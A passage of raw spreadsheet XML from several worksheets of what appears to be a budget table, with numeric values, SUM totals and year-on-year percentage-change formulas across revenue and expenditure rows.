    <row r="14" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A14" s="769" t="s">
        <v>839</v>
      </c>
      <c r="B14" s="775">
        <v>-2285</v>
      </c>
      <c r="C14" s="732">
        <v>505</v>
      </c>
      <c r="D14" s="733">
        <f t="shared" si="0"/>
        <v>-122.100656455142</v>
      </c>
    </row>
    <row r="15" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A15" s="769" t="s">
        <v>840</v>
      </c>
      <c r="B15" s="775">
        <v>2320</v>
      </c>
      <c r="C15" s="732">
        <v>2431</v>
      </c>
      <c r="D15" s="733">
        <f t="shared" si="0"/>
        <v>4.78448275862069</v>
      </c>
    </row>
    <row r="16" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A16" s="769" t="s">
        <v>841</v>
      </c>
      <c r="B16" s="775">
        <v>2991</v>
      </c>
      <c r="C16" s="732">
        <v>3165</v>
      </c>
      <c r="D16" s="733">
        <f t="shared" si="0"/>
        <v>5.81745235707121</v>
      </c>
    </row>
    <row r="17" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A17" s="769" t="s">
        <v>842</v>
      </c>
      <c r="B17" s="775">
        <v>8509</v>
      </c>
      <c r="C17" s="732">
        <v>8507</v>
      </c>
      <c r="D17" s="733">
        <f t="shared" si="0"/>
        <v>-0.0235045246209895</v>
      </c>
    </row>
    <row r="18" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A18" s="769" t="s">
        <v>843</v>
      </c>
      <c r="B18" s="775">
        <v>385</v>
      </c>
      <c r="C18" s="732">
        <v>593</v>
      </c>
      <c r="D18" s="733">
        <f t="shared" si="0"/>
        <v>54.025974025974</v>
      </c>
    </row>
    <row r="19" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A19" s="769" t="s">
        <v>844</v>
      </c>
      <c r="B19" s="775">
        <v>308</v>
      </c>
      <c r="C19" s="732">
        <v>332</v>
      </c>
      <c r="D19" s="733">
        <f t="shared" si="0"/>
        <v>7.79220779220779</v>
      </c>
    </row>
    <row r="20" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A20" s="769" t="s">
        <v>845</v>
      </c>
      <c r="B20" s="775"/>
      <c r="C20" s="732"/>
      <c r="D20" s="733"/>
    </row>
    <row r="21" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A21" s="766" t="s">
        <v>846</v>
      </c>
      <c r="B21" s="869">
        <f>SUM(B22:B28)</f>
        <v>124761</v>
      </c>
      <c r="C21" s="869">
        <f>SUM(C22:C28)</f>
        <v>123264</v>
      </c>
      <c r="D21" s="733">
        <f t="shared" si="0"/>
        <v>-1.19989419770601</v>
      </c>
    </row>
    <row r="22" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A22" s="769" t="s">
        <v>847</v>
      </c>
      <c r="B22" s="775">
        <v>6254</v>
      </c>
      <c r="C22" s="732">
        <v>6601</v>
      </c>
      <c r="D22" s="733">
        <f t="shared" si="0"/>
        <v>5.54844899264471</v>
      </c>
    </row>
    <row r="23" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A23" s="769" t="s">
        <v>848</v>
      </c>
      <c r="B23" s="775">
        <v>6400</v>
      </c>
      <c r="C23" s="732">
        <v>6778</v>
      </c>
      <c r="D23" s="733">
        <f t="shared" si="0"/>
        <v>5.90625</v>
      </c>
    </row>
    <row r="24" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A24" s="769" t="s">
        <v>849</v>
      </c>
      <c r="B24" s="775">
        <v>12690</v>
      </c>
      <c r="C24" s="732">
        <v>10300</v>
      </c>
      <c r="D24" s="733">
        <f t="shared" si="0"/>
        <v>-18.8337273443656</v>
      </c>
    </row>
    <row r="25" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A25" s="769" t="s">
        <v>850</v>
      </c>
      <c r="B25" s="775"/>
      <c r="C25" s="732"/>
      <c r="D25" s="733"/>
    </row>
    <row r="26" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A26" s="769" t="s">
        <v>851</v>
      </c>
      <c r="B26" s="775">
        <v>98884</v>
      </c>
      <c r="C26" s="732">
        <v>99020</v>
      </c>
      <c r="D26" s="733">
        <f t="shared" si="0"/>
        <v>0.137534889365317</v>
      </c>
    </row>
    <row r="27" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A27" s="769" t="s">
        <v>852</v>
      </c>
      <c r="B27" s="775">
        <v>109</v>
      </c>
      <c r="C27" s="732">
        <v>116</v>
      </c>
      <c r="D27" s="733"/>
    </row>
    <row r="28" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A28" s="769" t="s">
        <v>508</v>
      </c>
      <c r="B28" s="775">
        <v>424</v>
      </c>
      <c r="C28" s="732">
        <v>449</v>
      </c>
      <c r="D28" s="733">
        <f t="shared" si="0"/>
        <v>5.89622641509434</v>
      </c>
    </row>
    <row r="29" s="885" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A29" s="892" t="s">
        <v>853</v>
      </c>
      <c r="B29" s="893">
        <f>B5+B21</f>
        <v>256071</v>
      </c>
      <c r="C29" s="893">
        <f>C5+C21</f>
        <v>263766</v>
      </c>
      <c r="D29" s="737">
        <f t="shared" si="0"/>
        <v>3.00502594983423</v>
      </c>
    </row>
    <row r="30" s="886" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A30" s="894" t="s">
        <v>854</v>
      </c>
      <c r="B30" s="775">
        <f>SUM(B31:B32)</f>
        <v>7140</v>
      </c>
      <c r="C30" s="775">
        <f>SUM(C31:C32)</f>
        <v>23976</v>
      </c>
      <c r="D30" s="733">
        <f t="shared" si="0"/>
        <v>235.798319327731</v>
      </c>
    </row>
    <row r="31" s="886" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A31" s="769" t="s">
        <v>855</v>
      </c>
      <c r="B31" s="775"/>
      <c r="C31" s="895"/>
      <c r="D31" s="733"/>
    </row>
    <row r="32" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A32" s="769" t="s">
        <v>856</v>
      </c>
      <c r="B32" s="775">
        <v>7140</v>
      </c>
      <c r="C32" s="891">
        <v>23976</v>
      </c>
      <c r="D32" s="733">
        <f t="shared" si="0"/>
        <v>235.798319327731</v>
      </c>
    </row>
    <row r="33" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A33" s="766" t="s">
        <v>857</v>
      </c>
      <c r="B33" s="869">
        <f>SUM(B34:B40)</f>
        <v>292369</v>
      </c>
      <c r="C33" s="869">
        <f>SUM(C34:C40)</f>
        <v>270594</v>
      </c>
      <c r="D33" s="733">
        <f t="shared" si="0"/>
        <v>-7.44778003139868</v>
      </c>
    </row>
    <row r="34" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A34" s="769" t="s">
        <v>858</v>
      </c>
      <c r="B34" s="775">
        <v>12077</v>
      </c>
      <c r="C34" s="895">
        <v>12077</v>
      </c>
      <c r="D34" s="733">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A35" s="769" t="s">
        <v>859</v>
      </c>
      <c r="B35" s="775">
        <v>181087</v>
      </c>
      <c r="C35" s="891">
        <v>160000</v>
      </c>
      <c r="D35" s="733">
        <f t="shared" si="0"/>
        <v>-11.6446790769078</v>
      </c>
    </row>
    <row r="36" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A36" s="769" t="s">
        <v>860</v>
      </c>
      <c r="B36" s="775">
        <v>35115</v>
      </c>
      <c r="C36" s="891">
        <v>29000</v>
      </c>
      <c r="D36" s="733">
        <f t="shared" si="0"/>
        <v>-17.4142104513741</v>
      </c>
    </row>
    <row r="37" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A37" s="769" t="s">
        <v>861</v>
      </c>
      <c r="B37" s="775">
        <v>5489</v>
      </c>
      <c r="C37" s="895"/>
      <c r="D37" s="733">
        <f t="shared" si="0"/>
        <v>-100</v>
      </c>
    </row>
    <row r="38" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A38" s="769" t="s">
        <v>748</v>
      </c>
      <c r="B38" s="775">
        <v>50567</v>
      </c>
      <c r="C38" s="891">
        <v>63525</v>
      </c>
      <c r="D38" s="733">
        <f t="shared" si="0"/>
        <v>25.6254078747009</v>
      </c>
    </row>
    <row r="39" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A39" s="768" t="s">
        <v>862</v>
      </c>
      <c r="B39" s="775"/>
      <c r="C39" s="775"/>
      <c r="D39" s="733"/>
    </row>
    <row r="40" s="884" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A40" s="769" t="s">
        <v>749</v>
      </c>
      <c r="B40" s="775">
        <v>8034</v>
      </c>
      <c r="C40" s="891">
        <v>5992</v>
      </c>
      <c r="D40" s="733">
        <f t="shared" si="0"/>
        <v>-25.4169778441623</v>
      </c>
    </row>
    <row r="41" s="885" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A41" s="896" t="s">
        <v>750</v>
      </c>
      <c r="B41" s="897">
        <f>B29+B30+B33</f>
        <v>555580</v>
      </c>
      <c r="C41" s="880">
        <f>C29+C30+C33</f>
        <v>558336</v>
      </c>
      <c r="D41" s="882">
        <f t="shared" si="0"/>
        <v>0.496058173440369</v>
      </c>
    </row>
    <row r="42" s="884" customFormat="1" customHeight="1" spans="3:4">
      <c r="C42" s="868"/>
      <c r="D42" s="868"/>
    </row>
    <row r="43" s="884" customFormat="1" customHeight="1" spans="1:4">
      <c r="A43" s="898"/>
      <c r="B43" s="868"/>
      <c r="C43" s="868"/>
      <c r="D43" s="868"/>
    </row>
    <row r="44" s="884" customFormat="1" customHeight="1" spans="2:4">
      <c r="B44" s="868"/>
      <c r="C44" s="868"/>
      <c r="D44" s="868"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A3:D3"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="whole" operator="between" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B6:C7">
      <formula1>-1000000000</formula1>
      <formula2>1000000000</formula2>
    </dataValidation>
  </dataValidations>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.389583333333333" right="0.389583333333333" top="0.393055555555556" bottom="0.708333333333333" header="0.310416666666667" footer="0.310416666666667"/>
  <pageSetup paperSize="9" scale="95" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D41"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A15" activePane="bottomLeft" state="frozen"/>
      <selection/>
      <selection pane="bottomLeft" activeCell="D1" sqref="A$1:D$1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="21" customHeight="1" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="42.2685185185185" style="719" customWidth="1"/>
    <col min="2" max="2" width="16.1481481481481" style="720" customWidth="1"/>
    <col min="3" max="3" width="17.2777777777778" style="720" customWidth="1"/>
    <col min="4" max="4" width="16.6388888888889" style="720" customWidth="1"/>
    <col min="5" max="16384" width="10.2777777777778" style="719"/>
  </cols>
  <sheetData>
    <row r="1" ht="24" customHeight="1" spans="1:4">
      <c r="A1" s="864" t="s">
        <v>863</v>
      </c>
      <c r="B1" s="721"/>
      <c r="C1" s="721"/>
      <c r="D1" s="721"/>
    </row>
    <row r="2" ht="30.95" customHeight="1" spans="1:4">
      <c r="A2" s="722" t="s">
        <v>864</v>
      </c>
      <c r="B2" s="722"/>
      <c r="C2" s="722"/>
      <c r="D2" s="722"/>
    </row>
    <row r="3" s="712" customFormat="1" ht="22" customHeight="1" spans="1:4">
      <c r="A3" s="723"/>
      <c r="B3" s="865" t="s">
        <v>373</v>
      </c>
      <c r="C3" s="725"/>
      <c r="D3" s="725"/>
    </row>
    <row r="4" s="713" customFormat="1" ht="27.75" customHeight="1" spans="1:4">
      <c r="A4" s="727" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="728" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="727" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="866" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A5" s="867" t="s">
        <v>676</v>
      </c>
      <c r="B5" s="868">
        <v>45099</v>
      </c>
      <c r="C5" s="869">
        <v>45900</v>
      </c>
      <c r="D5" s="870">
        <f>IFERROR((C5-B5)/B5*100,"-")</f>
        <v>1.77609259628817</v>
      </c>
    </row>
    <row r="6" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A6" s="867" t="s">
        <v>677</v>
      </c>
      <c r="B6" s="868"/>
      <c r="C6" s="869"/>
      <c r="D6" s="870"/>
    </row>
    <row r="7" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A7" s="867" t="s">
        <v>678</v>
      </c>
      <c r="B7" s="868">
        <v>341</v>
      </c>
      <c r="C7" s="869">
        <v>340</v>
      </c>
      <c r="D7" s="870">
        <f t="shared" ref="D7:D40" si="0">IFERROR((C7-B7)/B7*100,"-")</f>
        <v>-0.293255131964809</v>
      </c>
    </row>
    <row r="8" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A8" s="867" t="s">
        <v>679</v>
      </c>
      <c r="B8" s="868">
        <v>17600</v>
      </c>
      <c r="C8" s="869">
        <v>17235</v>
      </c>
      <c r="D8" s="870">
        <f t="shared" si="0"/>
        <v>-2.07386363636364</v>
      </c>
    </row>
    <row r="9" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A9" s="867" t="s">
        <v>680</v>
      </c>
      <c r="B9" s="868">
        <v>117300</v>
      </c>
      <c r="C9" s="869">
        <v>117310</v>
      </c>
      <c r="D9" s="870">
        <f t="shared" si="0"/>
        <v>0.00852514919011083</v>
      </c>
    </row>
    <row r="10" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A10" s="867" t="s">
        <v>681</v>
      </c>
      <c r="B10" s="868">
        <v>884</v>
      </c>
      <c r="C10" s="869">
        <v>871</v>
      </c>
      <c r="D10" s="870">
        <f t="shared" si="0"/>
        <v>-1.47058823529412</v>
      </c>
    </row>
    <row r="11" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A11" s="867" t="s">
        <v>682</v>
      </c>
      <c r="B11" s="868">
        <v>3447</v>
      </c>
      <c r="C11" s="869">
        <v>3051</v>
      </c>
      <c r="D11" s="870">
        <f t="shared" si="0"/>
        <v>-11.4882506527415</v>
      </c>
    </row>
    <row r="12" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A12" s="867" t="s">
        <v>683</v>
      </c>
      <c r="B12" s="868">
        <v>111911</v>
      </c>
      <c r="C12" s="869">
        <v>112810</v>
      </c>
      <c r="D12" s="870">
        <f t="shared" si="0"/>
        <v>0.803316921482249</v>
      </c>
    </row>
    <row r="13" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A13" s="867" t="s">
        <v>684</v>
      </c>
      <c r="B13" s="868">
        <v>42613</v>
      </c>
      <c r="C13" s="869">
        <v>42057</v>
      </c>
      <c r="D13" s="870">
        <f t="shared" si="0"/>
        <v>-1.30476615117452</v>
      </c>
    </row>
    <row r="14" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A14" s="867" t="s">
        <v>685</v>
      </c>
      <c r="B14" s="868">
        <v>3393</v>
      </c>
      <c r="C14" s="869">
        <v>3147</v>
      </c>
      <c r="D14" s="870">
        <f t="shared" si="0"/>
        <v>-7.25022104332449</v>
      </c>
    </row>
    <row r="15" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A15" s="867" t="s">
        <v>686</v>
      </c>
      <c r="B15" s="868">
        <v>40421</v>
      </c>
      <c r="C15" s="869">
        <v>26295</v>
      </c>
      <c r="D15" s="870">
        <f t="shared" si="0"/>
        <v>-34.9471809208085</v>
      </c>
    </row>
    <row r="16" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A16" s="867" t="s">
        <v>687</v>
      </c>
      <c r="B16" s="868">
        <v>41030</v>
      </c>
      <c r="C16" s="869">
        <v>38096</v>
      </c>
      <c r="D16" s="870">
        <f t="shared" si="0"/>
        <v>-7.15086522057031</v>
      </c>
    </row>
    <row r="17" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A17" s="867" t="s">
        <v>688</v>
      </c>
      <c r="B17" s="868">
        <v>5664</v>
      </c>
      <c r="C17" s="869">
        <v>5509</v>
      </c>
      <c r="D17" s="870">
        <f t="shared" si="0"/>
        <v>-2.73658192090395</v>
      </c>
    </row>
    <row r="18" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A18" s="867" t="s">
        <v>689</v>
      </c>
      <c r="B18" s="868">
        <v>2230</v>
      </c>
      <c r="C18" s="869">
        <v>1462</v>
      </c>
      <c r="D18" s="870">
        <f t="shared" si="0"/>
        <v>-34.4394618834081</v>
      </c>
    </row>
    <row r="19" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A19" s="867" t="s">
        <v>690</v>
      </c>
      <c r="B19" s="868">
        <v>1163</v>
      </c>
      <c r="C19" s="869">
        <v>1064</v>
      </c>
      <c r="D19" s="870">
        <f t="shared" si="0"/>
        <v>-8.51246775580396</v>
      </c>
    </row>
    <row r="20" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A20" s="867" t="s">
        <v>691</v>
      </c>
      <c r="B20" s="868">
        <v>165</v>
      </c>
      <c r="C20" s="869">
        <v>71</v>
      </c>
      <c r="D20" s="870">
        <f t="shared" si="0"/>
        <v>-56.969696969697</v>
      </c>
    </row>
    <row r="21" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A21" s="867" t="s">
        <v>692</v>
      </c>
      <c r="B21" s="868">
        <v>932</v>
      </c>
      <c r="C21" s="869">
        <v>941</v>
      </c>
      <c r="D21" s="870">
        <f t="shared" si="0"/>
        <v>0.965665236051502</v>
      </c>
    </row>
    <row r="22" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A22" s="867" t="s">
        <v>693</v>
      </c>
      <c r="B22" s="868">
        <v>4663</v>
      </c>
      <c r="C22" s="869">
        <v>4646</v>
      </c>
      <c r="D22" s="870">
        <f t="shared" si="0"/>
        <v>-0.364572163843019</v>
      </c>
    </row>
    <row r="23" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A23" s="867" t="s">
        <v>694</v>
      </c>
      <c r="B23" s="868">
        <v>10893</v>
      </c>
      <c r="C23" s="869">
        <v>9900</v>
      </c>
      <c r="D23" s="870">
        <f t="shared" si="0"/>
        <v>-9.11594602038006</v>
      </c>
    </row>
    <row r="24" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A24" s="867" t="s">
        <v>695</v>
      </c>
      <c r="B24" s="868">
        <v>182</v>
      </c>
      <c r="C24" s="869">
        <v>185</v>
      </c>
      <c r="D24" s="870">
        <f t="shared" si="0"/>
        <v>1.64835164835165</v>
      </c>
    </row>
    <row r="25" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A25" s="867" t="s">
        <v>696</v>
      </c>
      <c r="B25" s="868">
        <v>3529</v>
      </c>
      <c r="C25" s="869">
        <v>3339</v>
      </c>
      <c r="D25" s="870">
        <f t="shared" si="0"/>
        <v>-5.38396146217059</v>
      </c>
    </row>
    <row r="26" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A26" s="867" t="s">
        <v>865</v>
      </c>
      <c r="B26" s="868"/>
      <c r="C26" s="869">
        <v>4510</v>
      </c>
      <c r="D26" s="870"/>
    </row>
    <row r="27" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A27" s="867" t="s">
        <v>866</v>
      </c>
      <c r="B27" s="868">
        <v>4467</v>
      </c>
      <c r="C27" s="869">
        <v>4452</v>
      </c>
      <c r="D27" s="870">
        <f>IFERROR((C27-B27)/B27*100,"-")</f>
        <v>-0.335795836131632</v>
      </c>
    </row>
    <row r="28" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A28" s="867" t="s">
        <v>867</v>
      </c>
      <c r="B28" s="868"/>
      <c r="C28" s="869"/>
      <c r="D28" s="870"/>
    </row>
    <row r="29" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A29" s="867" t="s">
        <v>868</v>
      </c>
      <c r="B29" s="868">
        <v>6312</v>
      </c>
      <c r="C29" s="869">
        <v>7505</v>
      </c>
      <c r="D29" s="870">
        <f>IFERROR((C29-B29)/B29*100,"-")</f>
        <v>18.9005069708492</v>
      </c>
    </row>
    <row r="30" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A30" s="871" t="s">
        <v>869</v>
      </c>
      <c r="B30" s="872">
        <f>SUM(B5:B29)</f>
        <v>464239</v>
      </c>
      <c r="C30" s="873">
        <f>SUM(C5:C29)</f>
        <v>450696</v>
      </c>
      <c r="D30" s="737">
        <f t="shared" si="0"/>
        <v>-2.91724736611961</v>
      </c>
    </row>
    <row r="31" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A31" s="874" t="s">
        <v>870</v>
      </c>
      <c r="B31" s="875">
        <f>SUM(B32:B33)</f>
        <v>7729</v>
      </c>
      <c r="C31" s="771">
        <f>SUM(C32:C33)</f>
        <v>26640</v>
      </c>
      <c r="D31" s="733">
        <f t="shared" si="0"/>
        <v>244.675895976194</v>
      </c>
    </row>
    <row r="32" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A32" s="876" t="s">
        <v>871</v>
      </c>
      <c r="B32" s="875">
        <v>589</v>
      </c>
      <c r="C32" s="771">
        <v>2664</v>
      </c>
      <c r="D32" s="733">
        <f t="shared" si="0"/>
        <v>352.292020373514</v>
      </c>
    </row>
    <row r="33" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A33" s="876" t="s">
        <v>872</v>
      </c>
      <c r="B33" s="875">
        <v>7140</v>
      </c>
      <c r="C33" s="771">
        <v>23976</v>
      </c>
      <c r="D33" s="733">
        <f t="shared" si="0"/>
        <v>235.798319327731</v>
      </c>
    </row>
    <row r="34" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A34" s="877" t="s">
        <v>778</v>
      </c>
      <c r="B34" s="878">
        <f>SUM(B35:B39)</f>
        <v>83612</v>
      </c>
      <c r="C34" s="878">
        <f>SUM(C35:C39)</f>
        <v>81000</v>
      </c>
      <c r="D34" s="733">
        <f t="shared" si="0"/>
        <v>-3.12395349949768</v>
      </c>
    </row>
    <row r="35" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A35" s="876" t="s">
        <v>873</v>
      </c>
      <c r="B35" s="875"/>
      <c r="C35" s="869"/>
      <c r="D35" s="870"/>
    </row>
    <row r="36" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A36" s="876" t="s">
        <v>874</v>
      </c>
      <c r="B36" s="875">
        <v>77620</v>
      </c>
      <c r="C36" s="869">
        <v>81000</v>
      </c>
      <c r="D36" s="870">
        <f t="shared" si="0"/>
        <v>4.35454779695955</v>
      </c>
    </row>
    <row r="37" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A37" s="876" t="s">
        <v>875</v>
      </c>
      <c r="B37" s="875"/>
      <c r="C37" s="869"/>
      <c r="D37" s="870"/>
    </row>
    <row r="38" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A38" s="876" t="s">
        <v>876</v>
      </c>
      <c r="B38" s="875"/>
      <c r="C38" s="869"/>
      <c r="D38" s="870"/>
    </row>
    <row r="39" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A39" s="876" t="s">
        <v>877</v>
      </c>
      <c r="B39" s="875">
        <v>5992</v>
      </c>
      <c r="C39" s="869"/>
      <c r="D39" s="870">
        <f t="shared" si="0"/>
        <v>-100</v>
      </c>
    </row>
    <row r="40" s="714" customFormat="1" ht="20.1" customHeight="1" spans="1:4">
      <c r="A40" s="879" t="s">
        <v>783</v>
      </c>
      <c r="B40" s="880">
        <f>B30+B31+B34</f>
        <v>555580</v>
      </c>
      <c r="C40" s="881">
        <f>C30+C31+C34</f>
        <v>558336</v>
      </c>
      <c r="D40" s="882">
        <f t="shared" si="0"/>
        <v>0.496058173440369</v>
      </c>
    </row>
    <row r="41" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B41" s="750"/>
      <c r="C41" s="750"/>
      <c r="D41" s="750"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="B3:D3"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.59" right="0.59" top="0.629861111111111" bottom="0.79" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" scale="93" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:F22"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B7" sqref="B7:B13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.84259259259259" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="40" style="518" customWidth="1"/>
    <col min="2" max="2" width="18.1481481481481" style="518" customWidth="1"/>
    <col min="3" max="3" width="17.4259259259259" style="518" customWidth="1"/>
    <col min="4" max="4" width="17.4259259259259" style="857" customWidth="1"/>
    <col min="5" max="6" width="10.4259259259259" style="518" customWidth="1"/>
    <col min="7" max="16384" width="9.84259259259259" style="518"/>
  </cols>
  <sheetData>
    <row r="1" s="509" customFormat="1" ht="30" customHeight="1" spans="1:4">
      <c r="A1" s="858" t="s">
        <v>878</v>
      </c>
      <c r="B1" s="521"/>
      <c r="C1" s="521"/>
      <c r="D1" s="831"/>
    </row>
    <row r="2" s="825" customFormat="1" ht="47.1" customHeight="1" spans="1:4">
      <c r="A2" s="722" t="s">
        <v>879</v>
      </c>
      <c r="B2" s="722"/>
      <c r="C2" s="722"/>
      <c r="D2" s="722"/>
    </row>
    <row r="3" s="511" customFormat="1" ht="22.35" customHeight="1" spans="1:4">
      <c r="A3" s="524"/>
      <c r="B3" s="525"/>
      <c r="C3" s="511" t="s">
        <v>373</v>
      </c>
      <c r="D3" s="835"/>
    </row>
    <row r="4" s="826" customFormat="1" ht="36" customHeight="1" spans="1:4">
      <c r="A4" s="859" t="s">
        <v>828</v>
      </c>
      <c r="B4" s="860" t="s">
        <v>519</v>
      </c>
      <c r="C4" s="860" t="s">
        <v>829</v>
      </c>
      <c r="D4" s="861" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="5" ht="25" customHeight="1" spans="1:4">
      <c r="A5" s="562" t="s">
        <v>880</v>
      </c>
      <c r="B5" s="563"/>
      <c r="C5" s="564"/>
      <c r="D5" s="565"/>
    </row>
    <row r="6" ht="25" customHeight="1" spans="1:4">
      <c r="A6" s="566" t="s">
        <v>881</v>
      </c>
      <c r="B6" s="567"/>
      <c r="C6" s="568"/>
      <c r="D6" s="432"/>
    </row>
    <row r="7" ht="25" customHeight="1" spans="1:4">
      <c r="A7" s="566" t="s">
        <v>882</v>
      </c>
      <c r="B7" s="567">
        <v>119340</v>
      </c>
      <c r="C7" s="568">
        <v>160000</v>
      </c>
      <c r="D7" s="432">
        <f>IFERROR((C7-B7)/B7,"-")*100</f>
        <v>34.0707223060164</v>
      </c>
    </row>
    <row r="8" ht="25" customHeight="1" spans="1:4">
      <c r="A8" s="566" t="s">
        <v>883</v>
      </c>
      <c r="B8" s="567"/>
      <c r="C8" s="568"/>
      <c r="D8" s="432"/>
    </row>
    <row r="9" ht="25" customHeight="1" spans="1:4">
      <c r="A9" s="566" t="s">
        <v>884</v>
      </c>
      <c r="B9" s="567">
        <v>1476</v>
      </c>
      <c r="C9" s="568">
        <v>1400</v>
      </c>
      <c r="D9" s="432">
        <f t="shared" ref="D9:D22" si="0">IFERROR((C9-B9)/B9,"-")*100</f>
        <v>-5.14905149051491</v>
      </c>
    </row>
    <row r="10" ht="25" customHeight="1" spans="1:4">
      <c r="A10" s="569" t="s">
        <v>885</v>
      </c>
      <c r="B10" s="567">
        <v>6306</v>
      </c>
      <c r="C10" s="568">
        <v>10000</v>
      </c>
      <c r="D10" s="432">
        <f t="shared" si="0"/>
        <v>58.5791309863622</v>
      </c>
    </row>
    <row r="11" ht="25" customHeight="1" spans="1:4">
      <c r="A11" s="566" t="s">
        <v>886</v>
      </c>
